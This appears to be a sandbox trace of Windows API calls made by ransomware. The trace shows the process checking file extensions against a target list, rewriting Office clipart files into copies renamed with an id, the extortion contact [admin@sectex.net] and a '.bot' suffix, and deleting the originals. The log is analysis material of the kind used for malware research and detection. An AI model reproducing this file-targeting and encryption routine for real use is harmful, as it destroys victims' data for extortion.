	[0170.345] lstrlenW (lpString=".xls") returned 4
	[0170.345] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0170.345] lstrlenW (lpString=".xlsx") returned 5
	[0170.345] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0170.345] lstrlenW (lpString=".ppt") returned 4
	[0170.345] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0170.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 63
	[0170.345] lstrlenW (lpString=".zip") returned 4
	[0170.345] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0170.345] lstrlenW (lpString=".rar") returned 4
	[0170.345] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0170.345] lstrlenW (lpString=".bz2") returned 4
	[0170.345] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0170.345] lstrlenW (lpString=".7z") returned 3
	[0170.345] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0170.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 63
	[0170.345] lstrlenW (lpString=".dbf") returned 4
	[0170.345] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0170.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 63
	[0170.346] lstrlenW (lpString=".1cd") returned 4
	[0170.346] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0170.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 63
	[0170.346] lstrlenW (lpString=".jpg") returned 4
	[0170.346] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0170.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 63
	[0170.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 63
	[0170.346] lstrlenW (lpString=".doc") returned 4
	[0170.346] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0170.346] lstrlenW (lpString=".docx") returned 5
	[0170.346] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0170.346] lstrlenW (lpString=".pdf") returned 4
	[0170.346] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0170.346] lstrlenW (lpString=".xls") returned 4
	[0170.346] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0170.346] lstrlenW (lpString=".xlsx") returned 5
	[0170.346] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0170.346] lstrlenW (lpString=".ppt") returned 4
	[0170.346] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0170.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 63
	[0170.346] lstrlenW (lpString=".zip") returned 4
	[0170.346] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0170.346] lstrlenW (lpString=".rar") returned 4
	[0170.346] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0170.346] lstrlenW (lpString=".bz2") returned 4
	[0170.346] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0170.346] lstrlenW (lpString=".7z") returned 3
	[0170.346] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0170.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 63
	[0170.346] lstrlenW (lpString=".dbf") returned 4
	[0170.346] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0170.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 63
	[0170.347] lstrlenW (lpString=".1cd") returned 4
	[0170.347] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0170.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 63
	[0170.347] lstrlenW (lpString=".jpg") returned 4
	[0170.347] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0170.347] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0170.347] lstrlenW (lpString="J0174952.JPG") returned 12
	[0170.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174952.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0170.992] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=24982) returned 1
	[0170.992] CloseHandle (hObject=0x388) returned 1
	[0170.992] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174952.jpg")) returned 0x20
	[0171.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174952.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174952.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0171.066] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.066] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174952.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380
	[0171.071] GetLastError () returned 0x0
	[0171.071] ReadFile (in: hFile=0x118, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x6196, lpOverlapped=0x0) returned 1
	[0171.117] WriteFile (in: hFile=0x380, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x61a0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x61a0, lpOverlapped=0x0) returned 1
	[0171.118] ReadFile (in: hFile=0x118, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.119] WriteFile (in: hFile=0x380, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.119] SetEndOfFile (hFile=0x380) returned 1
	[0171.119] CloseHandle (hObject=0x380) returned 1
	[0171.119] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.119] SetEndOfFile (hFile=0x118) returned 1
	[0171.121] CloseHandle (hObject=0x118) returned 1
	[0171.121] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.122] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174952.jpg")) returned 1
	[0171.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 63
	[0171.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 63
	[0171.122] lstrlenW (lpString=".doc") returned 4
	[0171.122] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0171.122] lstrlenW (lpString=".docx") returned 5
	[0171.122] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0171.122] lstrlenW (lpString=".pdf") returned 4
	[0171.122] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0171.122] lstrlenW (lpString=".xls") returned 4
	[0171.122] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0171.122] lstrlenW (lpString=".xlsx") returned 5
	[0171.123] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0171.123] lstrlenW (lpString=".ppt") returned 4
	[0171.123] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0171.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 63
	[0171.123] lstrlenW (lpString=".zip") returned 4
	[0171.123] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0171.123] lstrlenW (lpString=".rar") returned 4
	[0171.123] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0171.123] lstrlenW (lpString=".bz2") returned 4
	[0171.123] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0171.123] lstrlenW (lpString=".7z") returned 3
	[0171.123] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0171.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 63
	[0171.123] lstrlenW (lpString=".dbf") returned 4
	[0171.123] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0171.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 63
	[0171.123] lstrlenW (lpString=".1cd") returned 4
	[0171.123] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0171.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 63
	[0171.123] lstrlenW (lpString=".jpg") returned 4
	[0171.123] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0171.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 63
	[0171.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 63
	[0171.123] lstrlenW (lpString=".doc") returned 4
	[0171.123] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0171.123] lstrlenW (lpString=".docx") returned 5
	[0171.123] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0171.123] lstrlenW (lpString=".pdf") returned 4
	[0171.123] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0171.123] lstrlenW (lpString=".xls") returned 4
	[0171.123] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0171.123] lstrlenW (lpString=".xlsx") returned 5
	[0171.123] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0171.123] lstrlenW (lpString=".ppt") returned 4
	[0171.124] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0171.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 63
	[0171.124] lstrlenW (lpString=".zip") returned 4
	[0171.124] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0171.124] lstrlenW (lpString=".rar") returned 4
	[0171.124] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0171.124] lstrlenW (lpString=".bz2") returned 4
	[0171.124] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0171.124] lstrlenW (lpString=".7z") returned 3
	[0171.124] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0171.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 63
	[0171.124] lstrlenW (lpString=".dbf") returned 4
	[0171.124] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0171.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 63
	[0171.124] lstrlenW (lpString=".1cd") returned 4
	[0171.124] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0171.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 63
	[0171.124] lstrlenW (lpString=".jpg") returned 4
	[0171.124] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0171.124] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.124] lstrlenW (lpString="J0182902.WMF") returned 12
	[0171.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182902.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0171.125] GetFileSizeEx (in: hFile=0x118, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=7822) returned 1
	[0171.125] CloseHandle (hObject=0x118) returned 1
	[0171.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182902.wmf")) returned 0x20
	[0171.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182902.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182902.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0171.125] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.125] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182902.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380
	[0171.126] GetLastError () returned 0x0
	[0171.126] ReadFile (in: hFile=0x118, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1e8e, lpOverlapped=0x0) returned 1
	[0171.180] WriteFile (in: hFile=0x380, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1e90, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1e90, lpOverlapped=0x0) returned 1
	[0171.181] ReadFile (in: hFile=0x118, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.181] WriteFile (in: hFile=0x380, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.181] SetEndOfFile (hFile=0x380) returned 1
	[0171.181] CloseHandle (hObject=0x380) returned 1
	[0171.181] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.181] SetEndOfFile (hFile=0x118) returned 1
	[0171.183] CloseHandle (hObject=0x118) returned 1
	[0171.184] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.184] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182902.wmf")) returned 1
	[0171.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 63
	[0171.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 63
	[0171.185] lstrlenW (lpString=".doc") returned 4
	[0171.185] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.185] lstrlenW (lpString=".docx") returned 5
	[0171.185] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0171.185] lstrlenW (lpString=".pdf") returned 4
	[0171.185] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.185] lstrlenW (lpString=".xls") returned 4
	[0171.185] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.185] lstrlenW (lpString=".xlsx") returned 5
	[0171.185] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0171.185] lstrlenW (lpString=".ppt") returned 4
	[0171.185] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 63
	[0171.185] lstrlenW (lpString=".zip") returned 4
	[0171.185] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.186] lstrlenW (lpString=".rar") returned 4
	[0171.186] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.186] lstrlenW (lpString=".bz2") returned 4
	[0171.186] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.186] lstrlenW (lpString=".7z") returned 3
	[0171.186] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 63
	[0171.186] lstrlenW (lpString=".dbf") returned 4
	[0171.186] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 63
	[0171.186] lstrlenW (lpString=".1cd") returned 4
	[0171.186] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 63
	[0171.186] lstrlenW (lpString=".jpg") returned 4
	[0171.186] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 63
	[0171.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 63
	[0171.186] lstrlenW (lpString=".doc") returned 4
	[0171.186] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.186] lstrlenW (lpString=".docx") returned 5
	[0171.186] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0171.186] lstrlenW (lpString=".pdf") returned 4
	[0171.186] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.186] lstrlenW (lpString=".xls") returned 4
	[0171.186] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.186] lstrlenW (lpString=".xlsx") returned 5
	[0171.186] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0171.186] lstrlenW (lpString=".ppt") returned 4
	[0171.186] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 63
	[0171.186] lstrlenW (lpString=".zip") returned 4
	[0171.187] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.187] lstrlenW (lpString=".rar") returned 4
	[0171.187] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.187] lstrlenW (lpString=".bz2") returned 4
	[0171.187] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.187] lstrlenW (lpString=".7z") returned 3
	[0171.187] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 63
	[0171.187] lstrlenW (lpString=".dbf") returned 4
	[0171.187] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 63
	[0171.187] lstrlenW (lpString=".1cd") returned 4
	[0171.187] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 63
	[0171.187] lstrlenW (lpString=".jpg") returned 4
	[0171.187] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.187] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.187] lstrlenW (lpString="J0183174.WMF") returned 12
	[0171.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183174.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.203] GetFileSizeEx (in: hFile=0x354, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=28626) returned 1
	[0171.203] CloseHandle (hObject=0x354) returned 1
	[0171.203] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183174.wmf")) returned 0x20
	[0171.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183174.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183174.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.205] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.205] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183174.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0171.206] GetLastError () returned 0x0
	[0171.206] ReadFile (in: hFile=0x354, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x6fd2, lpOverlapped=0x0) returned 1
	[0171.208] WriteFile (in: hFile=0x124, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x6fe0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x6fe0, lpOverlapped=0x0) returned 1
	[0171.209] ReadFile (in: hFile=0x354, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.209] WriteFile (in: hFile=0x124, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.209] SetEndOfFile (hFile=0x124) returned 1
	[0171.209] CloseHandle (hObject=0x124) returned 1
	[0171.209] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.209] SetEndOfFile (hFile=0x354) returned 1
	[0171.212] CloseHandle (hObject=0x354) returned 1
	[0171.212] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.212] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183174.wmf")) returned 1
	[0171.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 63
	[0171.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 63
	[0171.215] lstrlenW (lpString=".doc") returned 4
	[0171.215] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.215] lstrlenW (lpString=".docx") returned 5
	[0171.215] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0171.215] lstrlenW (lpString=".pdf") returned 4
	[0171.215] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.215] lstrlenW (lpString=".xls") returned 4
	[0171.215] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.216] lstrlenW (lpString=".xlsx") returned 5
	[0171.216] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0171.216] lstrlenW (lpString=".ppt") returned 4
	[0171.216] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 63
	[0171.216] lstrlenW (lpString=".zip") returned 4
	[0171.216] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
